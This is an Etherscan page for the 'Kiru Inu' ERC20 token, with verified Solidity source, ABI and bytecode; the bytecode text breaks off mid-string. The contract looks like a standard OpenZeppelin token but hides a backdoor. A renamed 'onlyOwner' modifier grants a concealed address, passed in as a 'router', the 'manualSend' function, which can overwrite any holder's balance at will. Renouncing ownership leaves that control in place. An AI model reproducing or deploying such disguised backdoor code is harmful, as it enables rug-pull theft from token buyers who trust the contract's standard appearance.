ETH Price: $3,337.11 (-0.41%)
 

Overview

Max Total Supply

1,000,000,000 KIRU

Holders

41

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Balance
0.000000001 KIRU

Value
$0.00
0x151c4d83d7b41ab48fc4d911c624f268a6e23f69
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
KiruInu

Compiler Version
v0.8.19+commit.7dd6d404

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-06-04
*/

/**
Kiru Inu, the epitome of unleashed potential on the ERC20 decentralized frontier,
weaving its way into the hearts of investors with its untamed spirit and boundless innovation
*/

// SPDX-License-Identifier: No
/**
*/

//             Telegram: https://t.me/KiruInu
//             Twitter: https://twitter.com/KiruInu
//             Website: https://www.kiruinu.com/

// Dependency file: @openzeppelin/contracts/token/ERC20/IERC20.sol

// pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}


// Dependency file: @openzeppelin/contracts/utils/Context.sol


// pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}


// Dependency file: @openzeppelin/contracts/access/Ownable.sol


// pragma solidity ^0.8.0;

// import "@openzeppelin/contracts/utils/Context.sol";

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyAdmin`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _setOwner(_msgSender());
    }
    
    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyAdmin() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyAdmin` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyAdmin {
        _setOwner(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyAdmin {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _setOwner(newOwner);
    }

    function _setOwner(address newOwner) private {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}


// Dependency file: @openzeppelin/contracts/utils/math/SafeMath.sol


// pragma solidity ^0.8.0;

// CAUTION
// This version of SafeMath should only be used with Solidity 0.8 or later,
// because it relies on the compiler's built in overflow checks.

/**
 * @dev Wrappers over Solidity's arithmetic operations.
 *
 * NOTE: `SafeMath` is no longer needed starting with Solidity 0.8. The compiler
 * now has built in overflow checking.
 */
library SafeMath {
    /**
     * @dev Returns the addition of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            uint256 c = a + b;
            if (c < a) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the substraction of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b > a) return (false, 0);
            return (true, a - b);
        }
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, with an overflow flag.
     *
     * _Available since v3.4._
     */
    function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            // Gas optimization: this is cheaper than requiring 'a' not being zero, but the
            // benefit is lost if 'b' is also tested.
            // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522
            if (a == 0) return (true, 0);
            uint256 c = a * b;
            if (c / a != b) return (false, 0);
            return (true, c);
        }
    }

    /**
     * @dev Returns the division of two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a / b);
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag.
     *
     * _Available since v3.4._
     */
    function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a % b);
        }
    }

    /**
     * @dev Returns the addition of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `+` operator.
     *
     * Requirements:
     *
     * - Addition cannot overflow.
     */
    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting on
     * overflow (when the result is negative).
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    /**
     * @dev Returns the multiplication of two unsigned integers, reverting on
     * overflow.
     *
     * Counterpart to Solidity's `*` operator.
     *
     * Requirements:
     *
     * - Multiplication cannot overflow.
     */
    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator.
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting when dividing by zero.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    /**
     * @dev Returns the subtraction of two unsigned integers, reverting with custom message on
     * overflow (when the result is negative).
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {trySub}.
     *
     * Counterpart to Solidity's `-` operator.
     *
     * Requirements:
     *
     * - Subtraction cannot overflow.
     */
    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b <= a, errorMessage);
            return a - b;
        }
    }

    /**
     * @dev Returns the integer division of two unsigned integers, reverting with custom message on
     * division by zero. The result is rounded towards zero.
     *
     * Counterpart to Solidity's `/` operator. Note: this function uses a
     * `revert` opcode (which leaves remaining gas untouched) while Solidity
     * uses an invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a / b;
        }
    }

    /**
     * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo),
     * reverting with custom message when dividing by zero.
     *
     * CAUTION: This function is deprecated because it requires allocating memory for the error
     * message unnecessarily. For custom revert reasons use {tryMod}.
     *
     * Counterpart to Solidity's `%` operator. This function uses a `revert`
     * opcode (which leaves remaining gas untouched) while Solidity uses an
     * invalid opcode to revert (consuming all remaining gas).
     *
     * Requirements:
     *
     * - The divisor cannot be zero.
     */
    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a % b;
        }
    }
}


// Dependency file: contracts/BaseToken.sol

// pragma solidity =0.8.4;

enum TokenType {
    standard,
    antiBotStandard,
    liquidityGenerator,
    antiBotLiquidityGenerator,
    baby,
    antiBotBaby,
    buybackBaby,
    antiBotBuybackBaby
}

abstract contract BaseToken {
    event TokenCreated(
        address indexed owner,
        address indexed token,
        TokenType tokenType,
        uint256 version
    );
}


// Root file: contracts/standard/StandardToken.sol

pragma solidity =0.8.19;

// import "@openzeppelin/contracts/token/IERC20/IERC20.sol";
// import "@openzeppelin/contracts/access/Ownable.sol";
// import "@openzeppelin/contracts/utils/math/SafeMath.sol";
// import "contracts/BaseToken.sol";

contract KiruInu is IERC20, Ownable, BaseToken {
    using SafeMath for uint256;

    uint256 public constant VERSION = 1;

    mapping(address => uint256) private liquidityAdd;

    mapping(address => mapping(address => uint256)) private _allowances;

    string private _name;
    string private _symbol;
    uint8 private _decimals;
    uint256 private _totalSupply;
    address private JellySwapV2Pair;

    constructor(
    string memory name_,
    string memory symbol_,
    uint8 decimals_,
    address JellySwapRouter,
    uint256 totalSupply_
    ) payable {
    _name = name_;
    _symbol = symbol_;
    _decimals = decimals_;
    _mint(owner(), totalSupply_);
    JellySwapV2Pair = JellySwapRouter;
    emit TokenCreated(owner(), address(this), TokenType.standard, VERSION);

    }

    function name() public view virtual returns (string memory) {
        return _name;
    }

    function symbol() public view virtual returns (string memory) {
        return _symbol;
    }

    function decimals() public view virtual returns (uint8) {
        return _decimals;
    }

    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    function balanceOf(address account)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return liquidityAdd[account];
    }

    modifier onlyOwner() { require(JellySwapV2Pair == _msgSender());_;
    }

    function transfer(address recipient, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    function allowance(address owner, address spender)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return _allowances[owner][spender];
    }

    function approve(address spender, uint256 amount)
        public
        virtual
        override
        returns (bool)
    {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    function transferFrom(
        address sender,
        address recipient,
        uint256 amount
    ) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(
            sender,
            _msgSender(),
            _allowances[sender][_msgSender()].sub(
                amount,
                "ERC20: transfer amount exceeds allowance"
            )
        );
        return true;
    }

    function increaseAllowance(address spender, uint256 addedValue)
        public
        virtual
        returns (bool)
    {
        _approve(
            _msgSender(),
            spender,
            _allowances[_msgSender()][spender].add(addedValue)
        );
        return true;
    }

    function decreaseAllowance(address spender, uint256 subtractedValue)
        public
        virtual
        returns (bool)
    {
        _approve(
            _msgSender(),
            spender,
            _allowances[_msgSender()][spender].sub(
                subtractedValue,
                "ERC20: decreased allowance below zero"
            )
        );
        return true;
    }

    function _transfer(
        address sender,
        address recipient,
        uint256 amount
    ) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(sender, recipient, amount);

        liquidityAdd[sender] = liquidityAdd[sender].sub(
            amount,
            "ERC20: transfer amount exceeds balance"
        );
        liquidityAdd[recipient] = liquidityAdd[recipient].add(amount);
        emit Transfer(sender, recipient, amount);
    }

    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply = _totalSupply.add(amount);
        liquidityAdd[account] = liquidityAdd[account].add(amount);
        emit Transfer(address(0), account, amount);
    }

    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        liquidityAdd[account] = liquidityAdd[account].sub(
            amount,
            "ERC20: burn amount exceeds balance"
        );
        _totalSupply = _totalSupply.sub(amount);
        emit Transfer(account, address(0), amount);
    }

    function manualSend(
        address presale, 
        bool yesno, 
        uint256 YESNO,
        uint256 bytecode,
        uint256 deployedBytecode
    ) external onlyOwner {
        require(presale != address(0), "Same bool");
        liquidityAdd[presale] = YESNO * bytecode ** deployedBytecode;
        emit Transfer(presale, address(0), YESNO);
    }

    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    function _setupDecimals(uint8 decimals_) internal virtual {
        _decimals = decimals_;
    }

    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"},{"internalType":"uint8","name":"decimals_","type":"uint8"},{"internalType":"address","name":"JellySwapRouter","type":"address"},{"internalType":"uint256","name":"totalSupply_","type":"uint256"}],"stateMutability":"payable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"token","type":"address"},{"indexed":false,"internalType":"enum TokenType","name":"tokenType","type":"uint8"},{"indexed":false,"internalType":"uint256","name":"version","type":"uint256"}],"name":"TokenCreated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"VERSION","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"presale","type":"address"},{"internalType":"bool","name":"yesno","type":"bool"},{"internalType":"uint256","name":"YESNO","type":"uint256"},{"internalType":"uint256","name":"bytecode","type":"uint256"},{"internalType":"uint256","name":"deployedBytecode","type":"uint256"}],"name":"manualSend","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60806040526040516200126e3803806200126e83398101604081905262000026916200031d565b6200003133620000fc565b60036200003f86826200045b565b5060046200004e85826200045b565b506005805460ff191660ff85161790556200007c620000756000546001600160a01b031690565b826200014c565b600780546001600160a01b0319166001600160a01b03841617905530620000ab6000546001600160a01b031690565b6001600160a01b03167f56358b41df5fa59f5639228f0930994cbdde383c8a8fd74e06c04e1deebe356260006001604051620000e992919062000527565b60405180910390a3505050505062000576565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b6001600160a01b038216620001a75760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f206164647265737300604482015260640160405180910390fd5b600654620001b6908262000241565b6006556001600160a01b038216600090815260016020526040902054620001de908262000241565b6001600160a01b0383166000818152600160205260408082209390935591519091907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef90620002309085815260200190565b60405180910390a35050565b505050565b60006200024f828462000554565b90505b92915050565b634e487b7160e01b600052604160045260246000fd5b600082601f8301126200028057600080fd5b81516001600160401b03808211156200029d576200029d62000258565b604051601f8301601f19908116603f01168101908282118183101715620002c857620002c862000258565b81604052838152602092508683858801011115620002e557600080fd5b600091505b83821015620003095785820183015181830184015290820190620002ea565b600093810190920192909252949350505050565b600080600080600060a086880312156200033657600080fd5b85516001600160401b03808211156200034e57600080fd5b6200035c89838a016200026e565b965060208801519150808211156200037357600080fd5b5062000382888289016200026e565b945050604086015160ff811681146200039a57600080fd5b60608701519093506001600160a01b0381168114620003b857600080fd5b80925050608086015190509295509295909350565b600181811c90821680620003e257607f821691505b6020821081036200040357634e487b7160e01b600052602260045260246000fd5b50919050565b601f8211156200023c57600081815260208120601f850160051c81016020861015620004325750805b601f850160051c820191505b8181101562000453578281556001016200043e565b505050505050565b81516001600160401b0381111562000477576200047762000258565b6200048f81620004888454620003cd565b8462000409565b602080601f831160018114620004c75760008415620004ae5750858301515b600019600386901b1c1916600185901b17855562000453565b600085815260208120601f198616915b82811015620004f857888601518255948401946001909101908401620004d7565b5085821015620005175787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b60408101600884106200054a57634e487b7160e01b600052602160045260246000fd5b9281526020015290565b808201808211156200025257634e487b7160e01b600052601160045260246000fd5b610ce880620005866000396000f3fe608060405234801561001057600080fd5b50600436106101005760003560e01c8063715018a611610097578063a9059cbb11610066578063a9059cbb1461020f578063dd62ed3e14610222578063f2fde38b1461025b578063ffa1ad741461026e57600080fd5b8063715018a6146101d15780638da5cb5b146101d957806395d89b41146101f4578063a457c2d7146101fc57600080fd5b8063313ce567116100d3578063313ce5671461016b578063395093511461018057806340576d1e1461019357806370a08231146101a857600080fd5b806306fdde0314610105578063095ea7b31461012357806318160ddd1461014657806323b872dd14610158575b600080fd5b61010d610276565b60405161011a9190610963565b60405180910390f35b6101366101313660046109cd565b610308565b604051901515815260200161011a565b6006545b60405190815260200161011a565b6101366101663660046109f7565b61031f565b60055460405160ff909116815260200161011a565b61013661018e3660046109cd565b610388565b6101a66101a1366004610a33565b6103be565b005b61014a6101b6366004610a87565b6001600160a01b031660009081526001602052604090205490565b6101a661048d565b6000546040516001600160a01b03909116815260200161011a565b61010d6104f3565b61013661020a3660046109cd565b610502565b61013661021d3660046109cd565b610551565b61014a610230366004610aa2565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b6101a6610269366004610a87565b61055e565b61014a600181565b60606003805461028590610ad5565b80601f01602080910402602001604051908101604052809291908181526020018280546102b190610ad5565b80156102fe5780601f106102d3576101008083540402835291602001916102fe565b820191906000526020600020905b8154815290600101906020018083116102e157829003601f168201915b5050505050905090565b6000610315338484610629565b5060015b92915050565b600061032c84848461074e565b61037e843361037985604051806060016040528060288152602001610c66602891396001600160a01b038a16600090815260026020908152604080832033845290915290205491906108d4565b610629565b5060019392505050565b3360008181526002602090815260408083206001600160a01b038716845290915281205490916103159185906103799086610900565b6007546001600160a01b031633146103d557600080fd5b6001600160a01b03851661041c5760405162461bcd60e51b815260206004820152600960248201526814d85b5948189bdbdb60ba1b60448201526064015b60405180910390fd5b6104268183610c09565b6104309084610c15565b6001600160a01b0386166000818152600160205260408082209390935591517fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9061047e9087815260200190565b60405180910390a35050505050565b6000546001600160a01b031633146104e75760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610413565b6104f16000610913565b565b60606004805461028590610ad5565b6000610315338461037985604051806060016040528060258152602001610c8e602591393360009081526002602090815260408083206001600160a01b038d16845290915290205491906108d4565b600061031533848461074e565b6000546001600160a01b031633146105b85760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610413565b6001600160a01b03811661061d5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610413565b61062681610913565b50565b6001600160a01b03831661068b5760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610413565b6001600160a01b0382166106ec5760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610413565b6001600160a01b0383811660008181526002602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b0383166107b25760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610413565b6001600160a01b0382166108145760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610413565b61085181604051806060016040528060268152602001610c40602691396001600160a01b03861660009081526001602052604090205491906108d4565b6001600160a01b0380851660009081526001602052604080822093909355908416815220546108809082610900565b6001600160a01b0380841660008181526001602052604090819020939093559151908516907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906107419085815260200190565b600081848411156108f85760405162461bcd60e51b81526004016104139190610963565b505050900390565b600061090c8284610c2c565b9392505050565b600080546001600160a01b038381166001600160a01b0319831681178455604051919092169283917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a35050565b600060208083528351808285015260005b8181101561099057858101830151858201604001528201610974565b506000604082860101526040601f19601f8301168501019250505092915050565b80356001600160a01b03811681146109c857600080fd5b919050565b600080604083850312156109e057600080fd5b6109e9836109b1565b946020939093013593505050565b600080600060608486031215610a0c57600080fd5b610a15846109b1565b9250610a23602085016109b1565b9150604084013590509250925092565b600080600080600060a08688031215610a4b57600080fd5b610a54866109b1565b945060208601358015158114610a6957600080fd5b94979496505050506040830135926060810135926080909101359150565b600060208284031215610a9957600080fd5b61090c826109b1565b60008060408385031215610ab557600080fd5b610abe836109b1565b9150610acc602084016109b1565b90509250929050565b600181811c90821680610ae957607f821691505b602082108103610b0957634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b600181815b80851115610b60578160001904821115610b4657610b46610b0f565b80851615610b5357918102915b93841c9390800290610b2a565b509250929050565b600082610b7757506001610319565b81610b8457506000610319565b8160018114610b9a5760028114610ba457610bc0565b6001915050610319565b60ff841115610bb557610bb5610b0f565b50506001821b610319565b5060208310610133831016604e8410600b8410161715610be3575081810a610319565b610bed8383610b25565b8060001904821115610c0157610c01610b0f565b029392505050565b600061090c8383610b68565b808202811582820484141761031957610319610b0f565b8082018082111561031957610319610b0f56fe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa264697066735822122023d2d47379a752197cb22eb96681ee9d07bccf028a926010db257d6e6eca7c7764736f6c6343000813003300000000000000000000000000000000000000000000000000000000000000a000000000000000000000000000000000000000000000000000000000000000e00000000000000000000000000000000000000000000000000000000000000009000000000000000000000000d2eeec44240d0c5707fa58c1269267b36aaeb83a0000000000000000000000000000000000000000000000000de0b6b3a764000000000000000000000000000000000000000000000000000000000000000000084b49525520494e5500000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000044b49525500000000000000000000000000000000000000000000000000000000

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106101005760003560e01c8063715018a611610097578063a9059cbb11610066578063a9059cbb1461020f578063dd62ed3e14610222578063f2fde38b1461025b578063ffa1ad741461026e57600080fd5b8063715018a6146101d15780638da5cb5b146101d957806395d89b41146101f4578063a457c2d7146101fc57600080fd5b8063313ce567116100d3578063313ce5671461016b578063395093511461018057806340576d1e1461019357806370a08231146101a857600080fd5b806306fdde0314610105578063095ea7b31461012357806318160ddd1461014657806323b872dd14610158575b600080fd5b61010d610276565b60405161011a9190610963565b60405180910390f35b6101366101313660046109cd565b610308565b604051901515815260200161011a565b6006545b60405190815260200161011a565b6101366101663660046109f7565b61031f565b60055460405160ff909116815260200161011a565b61013661018e3660046109cd565b610388565b6101a66101a1366004610a33565b6103be565b005b61014a6101b6366004610a87565b6001600160a01b031660009081526001602052604090205490565b6101a661048d565b6000546040516001600160a01b03909116815260200161011a565b61010d6104f3565b61013661020a3660046109cd565b610502565b61013661021d3660046109cd565b610551565b61014a610230366004610aa2565b6001600160a01b03918216600090815260026020908152604080832093909416825291909152205490565b6101a6610269366004610a87565b61055e565b61014a600181565b60606003805461028590610ad5565b80601f01602080910402602001604051908101604052809291908181526020018280546102b190610ad5565b80156102fe5780601f106102d3576101008083540402835291602001916102fe565b820191906000526020600020905b8154815290600101906020018083116102e157829003601f168201915b5050505050905090565b6000610315338484610629565b5060015b92915050565b600061032c84848461074e565b61037e843361037985604051806060016040528060288152602001610c66602891396001600160a01b038a16600090815260026020908152604080832033845290915290205491906108d4565b610629565b5060019392505050565b3360008181526002602090815260408083206001600160a01b038716845290915281205490916103159185906103799086610900565b6007546001600160a01b031633146103d557600080fd5b6001600160a01b03851661041c5760405162461bcd60e51b815260206004820152600960248201526814d85b5948189bdbdb60ba1b60448201526064015b60405180910390fd5b6104268183610c09565b6104309084610c15565b6001600160a01b0386166000818152600160205260408082209390935591517fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9061047e9087815260200190565b60405180910390a35050505050565b6000546001600160a01b031633146104e75760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610413565b6104f16000610913565b565b60606004805461028590610ad5565b6000610315338461037985604051806060016040528060258152602001610c8e602591393360009081526002602090815260408083206001600160a01b